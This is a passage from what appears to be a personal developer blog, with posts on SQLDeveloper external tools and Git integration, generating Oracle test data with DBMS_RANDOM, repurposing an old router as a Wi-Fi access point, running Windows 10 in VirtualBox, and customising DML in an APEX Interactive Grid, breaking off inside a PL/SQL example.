    Macro Description syntax DB Connection String Database Connection String ${sqldev.conn} DB UserName Database username ${sqldev.dbuser} Environment Variable The value of an environment variable The var attribute specifies the name of the environment variable ${env:var=PATH} File Directory The directory containing the currently selected file ${file.dir} File Extension The extension of the currently selected file ${file.ext} File Name The name of the currently selected file ${file.name} File Name Without Extension The basename of the currently selected file ${file.name.no_ext} File Path Full path of the currently selected file ${file.path} File URL The URL of the currently selected file ${file.url} IDE Application Name The name of this application ${ide.name} IDE Classpath The full classpath of this application ${ide.classpath} IDE Install Directory The directory in which this application is installed ${ide.dir} IDE Oracle Home Directory The oracle home directory in which this application is installed. ${ide.oracle.dir} IDE User directory The user directory ${ide.user.dir} Prompt Displays a prompt at runtime to allow user to specify an argument value ${prompt} Prompt with Label Prompt user for a value. The label attribute specifies a label to display in the prompt dialog ${promptl:=prompt text} System Property The value of a system property. The name attribute specifies the name of the system property ${prop:name=property} Configuration details for common Windows tools

    Here’s a list of configurations that work for me on Windows 10.
    There are a couple of things that may help on Windows when looking for the information required to configure an external tool.
    First, if you’re unsure as to the location fo the executable of the program you need to run, you can simply run it and then open Task Manager and right-click it. This will give you the exe name and path.
    Second, whilst executables that are in your path do not require a fully qualified path name for SQLD to find them, it will usually need the full path to use the normal icon for that program.

    Tool Executable Arguments Run Directory Icon Location Windows Explorer C:\Windows\explorer.exe /select,${file.path} Notepad++ C:\Program Files(x86)\Notepad++\notepad++.exe ${file.path} ${file.dir} Git Bash C:\Program Files\Git\git-bash.exe ${file.dir} Putty C:\Program Files(x86)\PUTTY\putty.exe Excel C:\PROGRA~1\MICROS~1\Office16\EXCEL.EXE ${file.path} ${file.dir} FileZilla C:\Program Files\FileZilla FTP Client\filezilla.exe “-a ${file.path}” Snipping tool C:\Windows\system32\SnippingTool.exe ide.fileicon.file:/C:/Windows/system32/SnippingTool.exe Notepad notepad.exe ${file.path} ${file.dir} ide.fileicon.file:/C:/Windows/system32/notepad.exe Configuration details for common Ubuntu tools

    Things are slightly different on Ubuntu, No, I’m not about to go into a chauvanistic rant about the innate superiority of life with the Penguins – although I’ve not included Git Bash in this list because Ubuntu has proper Bash…

    Tool Executable Arguments Run Directory Icon Location Nautilus /usr/bin/nautilus ${file.dir} /usr/share/icons/gnome/16×16/apps/file-manager.png Gedit /usr/bin/gedit ${file.name} ${file.dir} /usr/share/icons/gnome/16×16/apps/accessories-text-editor.png Terminal /usr/bin/gnome-terminal ${file.dir} /usr/share/icons/gnome/16×16/apps/gnome-terminal.png LibreOffice Calc /usr/bin/libreoffice –calc ${file.name} ${file.dir} /usr/share/icons/gnome/16×16/apps/calc.png FileZilla /usr/bin/filezilla “-a ${file.path}” /usr/share/filezilla/resources/16×16/filezilla.png VS Code /usr/bin/code ${file.name} ${file.dir} Screenshot /usr/bin/gnome-screenshot /usr/share/icons/gnome/16×16/apps/applets-screenshooter.png

    Note that I couldn’t fine an appropriately sized icon for VS Code.

    Well that’s used up some time, but there’s still a month to go until the election. I’ll have to find something else to distract myself with.

    Using Git in SQLDeveloper

    Wed, 2019-11-06 14:09

    As I write, South Africa have just emerged victorious from the 2019 version of the Rugby World Cup having vanquished England in the final.
    This explains both the code used in the examples that follow and the fact that I’m writing this to escape from the “commiserations” pouring into my phone from my Welsh In-Laws. Tell me, what is the Welsh for Schadenfreude ?
    Continuing my SQLDeveloper appreciation fest, I’m going to look at the latest version of SQLDeveloper’s (19.2) level of integration with Git.
    Specifically, what I’ll be covering is :

    • Using the SQLDeveloper Files Tree to work with a local Git Repository
    • Creating a branch
    • Staging changes
    • Commiting changes
    • Comparing different versions of a file within a branch
    • Comparing branches
    • Merging branches
    • Deleting branches

    We’re going to do all of this without leaving the comfort of our favourite Oracle IDE…

    Environment

    Running SQLDeveloper 19.2, we’ll be working on a local Git repository using Git 2.7.4.
    I’m doing this on Ubuntu but SQLDeveloper seems to behave in the same way on Windows. I haven’t had the chance to do any comparison on MacOS but I’ve no reason to believe it won’t be the same story there too.

    Changing your perspective

    By default, SQLDeveloper views the world through objects in the database :

    Fortunately, it can also be persuaded to look at Files on your computer.
    To achieve this, simply go to the View menu and select Files :

    If you start exploring this view, you may well find that you’re seeing spots in front of your eyes :

    Don’t worry, it’s not contagious. It’s just SQLDeveloper realising that this directory is actually a local Git repository (repo).
    We can find out the branch that is currently active by right-clicking any member of the repo and selecting Versioning/Properties.
    In this case, we can see that we’re on master :

    We want to make some changes to this application code. We want to create a branch to do this so…

    Creating a new branch

    Right-click on one of the repo members and select Versioning/Create Branch :

    Enter the name you want to give the new branch. In my case find_winners
    Then click Select Commit and choose the commit from which you want to branch. For me it’s usually the latest one, which is just as well in this case :

    I want to switch to the new branch as soon as it’s created so I need to check Checkout Created Branch :

    Click OK and I’m now in the new branch. To check, I just look at the properties window of one of the repo members again ( in my case it’s the rwc root folder) :

    I’m going to edit the package header file because I want a function to tell me who the winners were for a given tournament :

    create or replace package save_finals as
    
        function get_winners( i_year rwc_finals.year%type)
            return countries.country_name%type;
    
        procedure add( i_year rwc_finals.year%type, i_host rwc_finals.host_cid%type, 
            i_team1 rwc_finals.team1%type, i_team2 rwc_finals.team2%type);
            
        procedure result( i_year rwc_finals.year%type, 
            i_t1_score rwc_finals.t1_score%type,
            i_t2_score rwc_finals.t2_score%type);
    end save_finals;
    /
    

    I can see that the icon for the changed file is now different in the File Tree :

    Furthermore, if I want to see what has changed since the last Git checkin, I can simply click on the History tab in the code editor and select the last Git checkin:

    Whilst I’m here, I’d like to add another view to my application, so I’m going to create a new file for it :

    create or replace view roll_of_honour_vw as
        select year, save_finals.get_winners(year) as champions
        from rwc_finals
    /    
    

    Now I’ve saved the file, I can see that it has a different icon in the Files Tree :

    Right, I want to start saving my changes to Git. First up then…

    Staging changes

    Now, it is possible to stage your files one-at-a-time by right-clicking the file and selecting Versioning/Add.

    However, if you select Add All instead, you get a list of all candidates for staging and you can then remove any files you don’t want using the Select checkbox.

    When you’re happy with your selection, hit OK

    We can now see that the file icons have changed again. The edited files ( save_finals.pks and save_finals.pkb) now have a green spot, whilst the newly created roll_of_honour_vw.sql now has a big plus icon :

    Incidentally, if you have a file in the tree that you don’t want git to manage, you can add it to the .gitignore file from the same menu.

    For example, I’ve added a todo list so I can keep track of what I’ve still got to write ( I can’t quite afford JIRA at the moment)

    If I right-click on the file and select Versioning/Add to .gitignore, I’ll get :

    Once I’m happy with my selections, I hit OK and the file icon changes :

    Committing changes

    The process for committing changes is similar to staging them. Right-click a repo member and select Versioning/Commit All…

    Note that we we could include non-stages files in the commit by checking Commit non-staged files.
    Finally, we add an appropriate commit message :


    Just as SQLDeveloper will allow you to compare the saved version of a file with the last committed version in the repo, you can also compare the file from two different commits :

    If we open save_finals.pkb and switch to the History tab, we can Filter to view only Git commits :

    If we now select the previous Git checkin, we can see what’s changed :

    Alternatively, you can achieve a similar effect by right-clicking the file then selecting Versioning/Version History.

    Comparing branches

    SQLDeveloper will even allow you to compare different branches.
    First, you need to go to the Teams menu and select Git/Branch Compare

    Remember, where on the find_winners branch so we need to select the master branch from the drop-down :

    You can compare the versions of a file in each branch by right-clickikng and selecting Compare : compare on a file :

    Merging branches

    We’ve finished our enhancement and we’re happy with it. It’s now time to merge the changes back into master.
    Before we get to merging, we need to switch to the branch that we want to merge to ( in this case, master).

    So, from the Team menu, select Git/Checkout

    Now click Select Branch and choose the branch we want to switch to ( in our case, Master) :

    Finally, hit the OK button and we’re on master.

    Next we need to go back to the Team menu and select Git/Merge

    Select branch you’re merging from and select a commit…

    The merge Window now looks something like this :

    Hit OK

    If we now look at the Commit History ( Team/Git/Commit History…) we can see that the latest commit matches the one that we selected to merge :

    We can also see the list of files that formed a commit by selecting it in the history pane:

    Deleting the branch

    Now we’ve finished with the branch, let’s do a bit of tidying up.

    From the Team menu, select Versions. This will bring up the Versions pane.
    Here, we can expand the Git node until we can see our local branches :

    The current branch has a green icon.

    To delete the find_winners branch, we simply select it in the tree and then click the big red cross :

    …and it’s gone.

    References

    Everything I’ve covered here involves using a local repository.
    Blaine Carter’s Using Git with Oracle SQL Developer video includes steps to connect to a remote repository.

    Galo Balda has also written a series of posts on using Git with SQLDeveloper. You can find them here.

    Oracle and Alternative Facts – generating test data with DBMS_RANDOM

    Tue, 2019-10-01 15:55

    There’s a bug in DBMS_RANDOM.VALUE. It consistently fails to return the correct set of lotter numbers.
    On the plus side, it is surprisingly useful when you find yourself in a situation which is all too common for a Data Warehouse developer.
    There’s a requirement for a new feed into your Warehouse from another system. You’ve managed to agree the file specification – what data will be included in the file, datatypes etc, but the developers working on the upstream system won’t be able to start providing test files for loading for weeks yet. Meanwhile, you need to start writing your code to ingest the feed.
    Fortunately, you have all the tools available to :

    • Generate lots of rows of test data
    • Generate random values for strings, numbers and dates
    • Use a set of pre-defined values randomly in your data generation

    First of all, let’s take a look at…

    The Feed File specification

    The file will contain records with the following attributes :

    Attribute Datatype first_name string last_name string email string phone_number string hire_date date job_id string salary float commission_pct float manager_id integer department_id integer

    Yes, it does look rather familiar. It is, in fact, a new feed into the HR.EMPLOYEES table.

    Generating lots of rows

    This is one of those tricks that are easy when you know how, but may leave you scratching your head the first time you see it, here’s how to generate lots of rows using a single dual query in Oracle :

    select rownum
    from dual
    connect by level <= 1000
    

    Yep, a thousand rows of data (or 10000, or a million), very quickly and with little typing.
    Of course, we’re going to need more than just a single column of integers to build our test data file. Fortunately, DBMS_RANDOM does have a few tricks up it’s sleeve…

    Think of a number

    When it comes to generating a random integer, you may first be tempted to do something like this :

    select dbms_random.random
    from dual; 
    

    This is a reasonable start but there are a few drawbacks with DBMS_RANDOM.RANDOM, namely :

    • you can’t control the range of numbers between which the result will fall
    • this function is depracated in later versions of Oracle

    On the face of it, DBMS_RANDOM.VALUE also has it’s issues. Passing in the minimum and maximum permissable values does offer control over the range of the result. However, a decimal value is returned :

    select dbms_random.value(1,59)
    from dual; 
    

    Fortunately, it’s a SQL function which means that you can use other SQL functions to offer greater control over the output :

    select trunc(dbms_random.value(1,59))
    from dual;
    

    This technique also applies when you want to generate a decimal to a set precision – e.g. :

    select round(dbms_random.value(100, 900), 2)
    from dual;
    

    It’s worth noting that the function returns a value greater than or equal to the lower bound value but less than the upper bound value. Therefore, if you want the possibility of including the maximum value in the result set you’ll need to add one to the maximum value you pass into the function :

    select trunc(dbms_random.value(1,60)) -- lottery numbers now go up to 59 !
    from dual;
    
    Dates to remember

    Generating random dates is a bit more involved. However, remember that dates are really just numbers underneath it all…

    select to_char(sysdate, 'J')
    from dual;
    

    The result is the number of days since 1st January 4712 BC.

    This means that we can perform mathematical operations on dates in the same way as numbers. Throw in a bit of randomness and we can generate random dates. For example, if we want to generate a date somewhere in the last decade…

     
    select to_date(to_char(sysdate, 'J') - trunc(dbms_random.value(1, 3652)), 'J') -- 3652 days in the last 10 years
    from dual;
    

    As we’re dealing with whole days here, the dates generated from this query all have the time element set to midnight…

    alter session set nls_date_format = 'DD-MON-YYYY HH24:MI:SS';
    select to_date(to_char(sysdate, 'J') - trunc(dbms_random.value(1, 3652)), 'J') -- 3652 days in the last 10 years
    from dual;
    
    
    TO_DATE(TO_CHAR(SYSD
    --------------------
    08-MAY-2015 00:00:00
    
    
    

    …but with a bit more jiggery-pokery, we can persuade DBMS_RANDOM to cough up a proper timestamp. Note that there are 86400 seconds in a day so…

    select 
        to_date( 
            to_char( sysdate, 'J') 
                - trunc( dbms_random.value( 1, 3652))
        , 'J')
                + trunc(dbms_random.value(1,86400))/86400
    from dual;
    
    TO_DATE(TO_CHAR(SYSD
    --------------------
    29-MAY-2010 02:57:00
    
    
    Stringing things together

    DBMS_RANDOM has one more neat trick up it’s sleeve – the ability to generate character strings of a defined length…

    select dbms_random.string('u', 20) as uppercase,
        dbms_random.string('l', 20) as lowercase,
        dbms_random.string('a', 20) as mixedcase,
        dbms_random.string('x', 20) as upper_alphanum,
        dbms_random.string('p', 20) as printable
    from dual;
    
    UPPERCASE            LOWERCASE            MIXEDCASE            UPPER_ALPHANUM       PRINTABLE           
    -------------------- -------------------- -------------------- -------------------- --------------------
    UIASUAOOHMJMCDBFMLTP xmscwbcyzfzukhnwrihj YmPMxDQHOMwrFxXiUGio 8ICORVCRGCLX62VVJ185 :#h(1HHjH1[wqZ$7[\!H
    
    

    The first parameter specifies the character set from which the string should be built ( uppercase alpha, lowercase alpha etc).
    The second parameter specifies the length of the string.
    Of course, if you wanted to mix things up a bit in terms of the length of string returned, you can always pass a random number as the string length…

    select dbms_random.string('u', trunc(dbms_random.value(1,21))) as stringy
    from dual
    connect by level <= 5
    /
    
    STRINGY             
    --------------------
    ZWPPBZ              
    URLBDIEQMHPAIMPWPML 
    DCQSOMB             
    WJLFIATWSSXTIHAXLPH 
    MIXTEQQIDNZZSQVVI   
    
    
    Randomly selecting valid values

    Whilst we could make an attempt at generating a test file simply using the techniques we’ve looked at so far, we know that this will only get us so far.
    The ultimate destination for the records in the file is the EMPLOYEES table, which has Foreign Keys to both JOBS (JOB_ID) and DEPARTMENTS (DEPARTMENT_ID).
    Whilst we could simply hard-code values to ensure that they are valid, we could get a little more creative and make a random selection.
    In the event, I’ve decided to both.
    I’ll hard-code the JOB_ID to be “IT_PROG” because, let’s face it, you can never have enough programmers.

    That leaves us with DEPARTMENT_ID and MANAGER_ID, which we can get from the DEPARTMENTS table. We want to select random values from this table. Now, before we go any further, it’s probably worth considering this, seemingly innocuous query :

    with some_values as (select rownum as id from dual connect by level <=5)
    select id
    from some_values
    where id = trunc(dbms_random.value(1,6))
    /
    

    If you execute this a few times, you’ll start to see something rather strange. The query will sometimes return no rows at all, or more than one row.
    The reason for this behaviour is explained by Mr Kyte himself here.

    This means that we need to take an alternative approach to selecting our random DEPARTMENTS records.

    First of all, we’ll need to fetch a set of unique records from the table. As it’s a small table, we may as well get all of them. Although they already have a synthetic key, we’ll want to give them an additonal one for reasons which will shortly become apparent…

    select rownum as id, department_id, manager_id
    from departments
    /
    
    
            ID DEPARTMENT_ID MANAGER_ID
    ---------- ------------- ----------
             1            10        200
             2            20        201
             3            30        114
             4            40        203
             5            50        121
             6            60        103
             7            70        204
             8            80        145
             9            90        100
            10           100        108
            11           110        205
            12           120           
            13           130           
            14           140           
            15           150           
            16           160           
            17           170           
            18           180           
            19           190           
            20           200           
            21           210           
            22           220           
            23           230           
            24           240           
            25           250           
            26           260           
            27           270           
    
    27 rows selected. 
    
    

    We’ll need to know how many records we have in the result set so that we can set the maximum value we want to select from when we randomly pick our record.
    So, our query now evolves :

    with dept as ( 
        select rownum as id, department_id, manager_id
        from departments)
    select max(id) from dept
    /
    
       MAX(ID)
    ----------
            27
    
    

    Using this second query as an in-line view, we can use this value to seed a randomly generated key in another in-line view, one which we can then use to join back to the DEPARTMENT records

    with dept as (select rownum as id, department_id, manager_id from departments),
        dept_count as (select max(id) as num_depts from dept),
        -- The main query that generates most of the data
        emp as (
            select 
                dbms_random.string('u', trunc(dbms_random.value(1,22))) as  first_name,
                dbms_random.string('u',trunc(dbms_random.value(1,22))) as last_name,
                dbms_random.string('l',trunc(dbms_random.value(10,27))) as email,
                -- use hard-coded value or null 50/50 chance
                case when mod(trunc(dbms_random.value(1,11)),2) = 0 then null else '555.123.4567' end as phone_number, 
                to_date(to_char(sysdate, 'J') - trunc(dbms_random.value(1,3652)), 'J') as hire_date,
                trunc(dbms_random.value( 1000, 3500)) as salary,
                case when mod(trunc(dbms_random.value(1,11)), 5) = 0 then trunc(dbms_random.value( 0,20)) end as commission_pct,
                -- value to use as a key to join onto the dept ilv
                trunc(dbms_random.value(1, dept_count.num_depts +1)) as dept_key,
                'IT_PROG' as job_id -- hard-coded for every record - ensure it's valid this time around.
            from dual, dept_count
            connect by level <= 10)
        select 
            emp.first_name,
            emp.last_name,
            emp.email,
            emp.phone_number,
            emp.hire_date,
            emp.salary,
            emp.commission_pct,
            dept.department_id,
            dept.manager_id,
            emp.job_id
        from emp
        inner join dept 
            on emp.dept_key = dept.id
    /
    

    The output is suitably, well, random :

    Of course, if you want to delimit the file and are using SQLDeveloper or SQLCl, you can simply do something like…

    set sqlformat loader
    

    …and your query output will be pipe delimited automagically.

    Extending the range of my Home Network Wi-fi by converting an old router into a Wireless Access Point

    Mon, 2019-09-02 08:11

    The ongoing Ashes series appears to have become all about comebacks.
    First of all we had Steve Smith, in his first test since the end of his Sandpaper-gate ban essaying one of the great feats of sporting redemption.
    Then we had Ben Stokes dragging England to a preposterous victory target of 359 having been skittled for 67 in their first innings.

    Making a rather more modest comeback in this post is an old EE Bright Box 1 router, which has been gathering dust since I got a replacement a couple of years ago.

    What follows is one way to adapt this old piece of kit to extend the WiFi range on a current home network.
    I want to do this by creating an additional Wireless Access Point positioned away from the main router.

    A Typical Home Area Network

    A Home Area Network (HAN) usually consists of a Router that acts as a single gateway for connection to the internet.
    All the devices in the home will connect to the router and therefore get access to the internet, as well as other devices in the HAN.
    Within the HAN, the router will hand out a unique IP address to each device as it connects using the standard Dynamic Host Configuration Protocol (DHCP).
    The DHCP allocated IP addresses are normally somewhere in the range of 192.168.1.1 to 192.168.1.255 (although the start and end addresses of the range will vary).

    Powerline Adapters

    Creating a second wireless access point to your network can be a fairly low-tech, low-cost approach to utilising your old router.
    Essentially, you need to connect it to the main router via an ethernet (network) cable then place it somewhere where your wireless signal isn’t so great. This, in itself, might not seem very practical unless you have a very long network cable.
    Alternatively, you can use a simple Powerline Adapter.
    You actually need two adapters. The first is plugged into a power socket near the main router and connected to it via a network cable.
    The second can then be plugged into any socket on the same electrical circuit.
    You can then connect the router to the second extender via a (shorter) network cable. Devices will then be able to connect to the network wirelessly simply by selecting the second router as their wireless access point.

    Information required from your main router

    Once we’re finished, our main router will regard our Bright Box as simply another device attached to the LAN. However, we’ll need to give the Bright Box a fixed IP address that doesn’t conflict with any other connected device.

    To determine what your options are, you’ll need to check the settings on your main router to establish the range of possible DHCP addresses it uses.
    To do this, you need to go to the Router’s admin page.

    In the unlikely event that your Router is using this entire address range to allocate IP addresses to devices connecting to the network, you will need to change it.
    In my case, my Router’s DHCP settings are to assign addresses starting at 192.168.1.64, so I know that choosing an address outside of that for my Bright Box (e.g. 192.168.1.10) should be safe.

    This is something I’ll come back to in a bit. First though…

    Accessing the Admin Page on the Bright Box

    To start playing around with the configuration of the router, you need to be able to access it’s admin pages.
    In the case of my Bright Box 1, the admin address and login details are included on a sticker on the underside of the router.
    The address for the admin screen is :

    http://192.168.1.1
    

    At this point, I don’t want to have the Bright Box connected to the main network, I just need to note the Wireless Network Name (SSID) on the sticker and connect to that network once it’s switched on.
    In my case the Bright Box’s Network name is currently set to EE-BrightBox-qq5xjw.

    Once I connect to this network, I can visit the admin page in the browser :

    …and check/change the wireless password as required :

    Remember, at this point, the Bright Box is on a completely separate network to the main router.

    Backing up the existing Router config

    Before I start changing stuff, I want to make sure that I can get back to a known working configuration – i.e. the one currently in place on the Bright Box.
    Like most routers, it has the option to backup this setting.
    On the Bright Box admin site, I need to go to Advanced/Tools/Configuraton/Backup :

    By clicking on the Backup button, I can choose the location to save a file called backup.bin which I can use to restore my router settings to what they are currently should I need to.

    Once that’s done, we can move onto…

    Performing a Factory Reset

    Whilst you can do this via the reset button on the back of the Bright Box, I chose instead to use the Router’s Admin application.
    Navigating to Advanced/Tools/Factory Default, we bring up :

    Clicking the button results in :

    As we’ve already backed up the router configuration, we’re happy to proceed.

    We’ll then have to wait for the reset to complete. In the meantime, we’ll get a screen like this :

    Perhaps unsurprisingly, the router will kick you off the admin site once the reset is complete. However, you can verify the changes by reconnecting and looking at Basic/Broadband Settings :

    Re-configuring the Bright Box as a Wireless Access Point

    To start with, we need to navigate to Basic/Broadband Settings and set :

    • Broadband Type : Fibre/Ethernet
    • Protocol: Bridging

    …and then hit Save Settings.

    Next, we go to Advanced/DHCP. Here is where we specify a static address for the Bright Box ensuring that it is outside of the DHCP range of the main router:

    Gateway IP Address : 192.168.1.10

    We also disable the Bright Box’s own internal DHCP functionality :
    DHCP Server : Disable

    Next, we want to disable Network Address Translation (NAT) on the Bright Box as we’re just using it to pass traffic through to the main router.
    Select NAT from the left-hand menu and set :

    NAT module function : Disable

    The next two steps are optional.
    Firstly, I want to change the Network Name (SSID) that the Bright Box broadcasts.
    To do this, I need to go to Wireless Settings/SSID Management and set :

    Wireless Network Name(SSID) : mike1

    The second of the optional steps is specific to the Bright Box.
    The default password for this router is not very secure – you can check this article for details – so I’m going to change it.
    To do this, I need to go to Basic/Wireless Settings :

    OK, so you might want to pick a slightly more secure password than this, but you get the idea.

    Finally, click Save Settings.

    Once all this is done, we need to power down the Bright Box and then connect the Ethernet cable from the Powerline Adapter to the WAN port (LAN 4) on it.

    Now we can power up the Bright Box once more and check the effect of our changes :

    Testing the new configuration

    Once the Bright Box is up and running again, the first thing we should notice is that we have a new entry in our list of available wifi networks. For example, if I check this on my Ubuntu laptop by running…

    nmcli dev wifi
    

    I can connect to this new access point using the password we set during the configuration steps we’ve just completed :

    Thus connected, I can now access the internet in the normal way :

    …and still have time to get comfortable before David Warner’s now inevitable double-hundred at Old Trafford.

    VirtualBox – running a Windows 10 Guest on an Ubuntu Host

    Fri, 2019-08-02 10:02

    Yes, you read that right. There are lots of guides out there on how to set up and run Ubuntu in VirtualBox on a Windows host.
    These days, you even have access to an Ubuntu sub-system in Windows itself.
    If, like me, you’re OS of choice is Ubuntu but you need to test how something behaves in Windows – is it possible to knock up an appropriate environment ?
    The answer is, of course, yes – otherwise this would be quite a short post.

    The following steps will work for VirtualBox on any host – Linux, Mac, even Windows.

    What I’m going to cover is :

    • Finding a Windows ISO
    • Configuring the VM in VirtualBox
    • Persuading VirtualBox to use a sensible screen size for your new VM

    But first…

    A quick word about versions

    The Host OS I’m running is Ubuntu 16.04 LTS.
    I’m using version 5.0 of VirtualBox.
    NOTE – steps to install VirtualBox on a Debian-based host such as Ubuntu can be found here.
    The Guest OS I’m installing is, as you’d expect, Windows 10.

    Finding a Windows ISO

    Depending on which Windows edition you are after, there are a couple of places you can look.
    Microsoft provides an ISO for a 180-day evaluation version of Windows Server here.

    In this case, I simply want to try Windows 10 so I need to go to this page.

    Once here, I need to select an edition…

    …and the language…

    …before we’re presented with a choice of 32 or 64-bit :

    I’ve chosen 64-bit. After the download, I am now the proud owner of :

    -rw-rw-r-- 1 mike mike 4.7G Jul 10 17:10 Win10_1903_V1_English_x64.iso
    
    Creating the VirtualBox VM

    Fire up VirtualBox and click on the New button to start the Create Virtual Machine wizard :

    …Next assign it some memory


    I’m going to create a Virtual Hard Disk :

    …using the default type…

    …and being dynamically allocated…

    …of the size recommended by VirtualBox :

    I now have a new VM, which I need to point at the Windows ISO I downloaded so that I can install Windows itself :

    All I have to do now is follow the Windows installation prompts, a process which I’ll not bore you with here.
    However, you may be interested to learn that you don’t necessarily require a Product Key for this installation.
    Chris Hoffman has produced an excellent guide on the subject.

    Installing Guest Additions

    Now I’ve configured Windows, I still need to install VirtualBox Guest Additions. Among other things, this will help to control the screen size of the VM so that I don’t need a magnifying glass !

    First of all, we need to virtually eject the virtual cd containing the Windows ISO. To do this, we actually go to the VM’s VirtualBox menu and select Devices/Optical Drives/Remove disk from virtual drive :

    Now, using the same menu (Devices), we select Insert Guest Additions CD Image :

    When Windows prompts you, choose to install :

    Accept the defaults when prompted and then reboot the VM.

    If, by some chance you are still faced with a small viewport for your Windows VM, you can try the following…

    Resizing the VM display

    Go to the VirtualBox application itself and with the VM selected, go to the File/Preferences menu.

    Click on Display, and set the Maximum Guest Screen Size to Automatic

    When you next re-start the VM, the window should now be a more reasonable size.
    In fact, with any luck, your desktop should now look something like this :

    The best way to run Windows !

    Customizing DML in an APEX Interactive Grid

    Tue, 2019-07-23 16:06

    It should have been quite a relaxing Cricket World Cup final. After all, it was England v New Zealand. I was guaranteed to be on the winning side.
    After several hours of nerve-shredding tension had failed to separate the teams England were awarded the trophy on the basis of dumb luck hitting more boundaries. The result was born with stoicism by the Black Caps, whose philosophy would, in other countries, be known as “Elite Niceness”. By a cruel twist of fate, Ben Stokes – England’s star all-rounder and Man of the Match – was actually born in Christchurch.
    Oracle APEX has it’s own star all-rounder in the shape of the Editable Interactive Grid ( see what I did there ?)
    As well as presenting information in the same way as an Interactive Report, it allows users to perform DML operations on the records it displays – provided it’s based on a single table.
    What we’re going to look at here is how to base an Interactive Grid (IG) on a Query rather than a table whilst retaining the ability to perform DML operations on the displayed records. To achieve this, we’ll be customizing the PL/SQL that is executed when a DML operation is invoked in the IG.

    The Application

    For what follows, I’ll be using APEX 18.2 running against an Oracle 18cXE database.

    We have two related tables which hold information about Men’s 50-over Cricket World Cup Finals :

    The tables were created as follows :

    create table teams(
        cid varchar2(3) primary key,
        team_name varchar2(100) not null)
    /
    
    create table finals(
        tournament_year number(4) primary key,
        date_played date,
        venue varchar2(100),
        winning_tcid varchar2(3) references teams(cid),
        losing_tcid varchar2(3) references teams(cid),
        winning_margin varchar2(100))
    /    
    

    … and have been populated with some data. The TEAMS table first…

    insert into teams( cid, team_name)
    values('AUS', 'AUSTRALIA');
    
    insert into teams( cid, team_name)
    values('ENG', 'ENGLAND');
    
    insert into teams( cid, team_name)
    values('RSA', 'SOUTH AFRICA');
    
    insert into teams( cid, team_name)
    values('WI', 'WEST INDIES');
    
    insert into teams( cid, team_name)
    values('IND', 'INDIA');
    
    insert into teams( cid, team_name)
    values('NZL', 'NEW ZEALAND');
    
    insert into teams( cid, team_name)
    values('PAK', 'PAKISTAN');
    
    insert into teams( cid, team_name)
    values('SL', 'SRI LANKA');
    
    insert into teams( cid, team_name)
    values('ZIM', 'ZIMBABWE');
    
    insert into teams( cid, team_name)
    values('BAN', 'BANGLADESH');
    
    insert into teams( cid, team_name)
    values('AFG', 'AFGHANISTAN');
    
    insert into teams( cid, team_name)
    values('IRL', 'IRELAND');
    
    commit;
    

    …and then FINALS…

    insert into finals(tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
    values(1975, to_date('21-JUN-1975', 'DD-MON-YYYY'), 'LORDS', 'WI', 'AUS', '17 runs');
    
    insert into finals(tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
    values(1979, to_date('23-JUN-1979' , 'DD-MON-YYYY'), 'LORDS', 'WI', 'ENG', '92 runs');
    
    insert into finals(tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
    values(1983, to_date('25-JUN-1983' , 'DD-MON-YYYY'), 'LORDS', 'IND', 'WI', '43 runs');
    
    insert into finals(tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
    values(1987, to_date('08-NOV-1987' , 'DD-MON-YYYY'), 'EDEN GARDENS', 'AUS', 'ENG', '7 runs');
    
    insert into finals(tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
    values(1992, to_date('25-MAR-1992' , 'DD-MON-YYYY'), null, 'PAK', 'ENG', '22 runs');
    
    -- deliberate mistake to be corrected later
    insert into finals(tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
    values(1997, to_date('17-MAR-1996' , 'DD-MON-YYYY'), 'QADDAFI STADIUM', 'SL', 'AUS', '8 wickets');
    
    commit;
    
    

    The data that we wish to present to application users can be retrieved with the following query :

    select f.tournament_year, f.date_played, 
        initcap(f.venue) as venue,
        initcap(win.team_name) as winners,
        initcap(ru.team_name) as runners_up,
        f.winning_margin
    from finals f
    inner join teams win on f.winning_tcid = win.cid
    inner join teams ru on f.losing_tcid = ru.cid
    /
    

    There are a couple of issues with the data as it stands so we want users to be able to edit the existing application records and add new ones.
    As we’re using APEX, it would be good if we could use an Editable Interactive Grid as this would mean only needing to write a single page to handle all of these actions.
    Of course, we could simply create a view using this query and then knock-up an Instead Of trigger to handle any DML. Alternatively…

    Creating the Interactive Grid

    The first step is to create a Region…

    …and define it as an IG…

    …using the above query as the Source SQL Query

    When we run this (after saving our changes), we can see that the ROW_SELECTOR and ROW_ACTION widgets are missing :

    Making the IG Editable

    In order to persuade APEX to add these widgets, we need to make the IG Editable. We can do this by going to the Region’s Attributes and setting the Edit Enabled property to Yes

    Among other things, this automatically creates a Save Interactive Grid Data process :

    However, if we attempt to run the page now (after saving these changes), we’ll hit an error…

    …so we need to select a Primary Key.
    TOURNAMENT_YEAR will fulfil this purpose in our IG, so we just need to adjust the properties of the column :

    When we save the change and run the page we can see that the ROW_SELECTOR and ROW_ACTION are now present :

    The IG is not based on a table or view, remember, so we still need to tell APEX what to do when any DML actions are initiated by the user.

    Customising the Save Interactive Grid Data process

    Returning to the Processing Tab in the Page Designer we need to change the Type of this process to PL/SQL Code :

    In the Source PL/SQL Code box, we need to enter a PL/SQL block which will be run whenever the Page processes a DML action.
    In order to tell what specific DML action a row is subject to, we can look at the value of the built-in $APEXROW_STATUS variable.
    The possible values are :

    • C – for Create
    • U – Update
    • D – Delete

    Therefore, one approach for our PL/SQL block would be simply to include the actual DML statements we want to execute in-line like this :

    declare 
        l_win_tcid finals.winning_tcid%type;
        l_ru_tcid finals.losing_tcid%type;
        
        cursor c_team_cid( i_name teams.team_name%type)
        is
            select cid
            from teams
            where team_name = upper(i_name);
    begin
        -- reset the variables for each pass through this process
        l_win_tcid := null;
        l_ru_tcid := null;
        
        if :APEX$ROW_STATUS = 'D' then
            -- DELETE the record
            delete from finals
            where tournament_year = :TOURNAMENT_YEAR;
            
        else
    
            -- As we're either doing an UPDATE or an INSERT, we need to find the 
            -- CID value for each of the team names ( if specified)
    
            if :WINNERS is not null then
                open c_team_cid(:WINNERS);
                fetch c_team_cid into l_win_tcid;
                close c_team_cid;
            end if;
    
            if :RUNNERS_UP is not null then
                open c_team_cid(:RUNNERS_UP);
                fetch c_team_cid into l_ru_tcid;
                close c_team_cid;
            end if;
            
            if :APEX$ROW_STATUS = 'U' then
                -- UPDATE the record
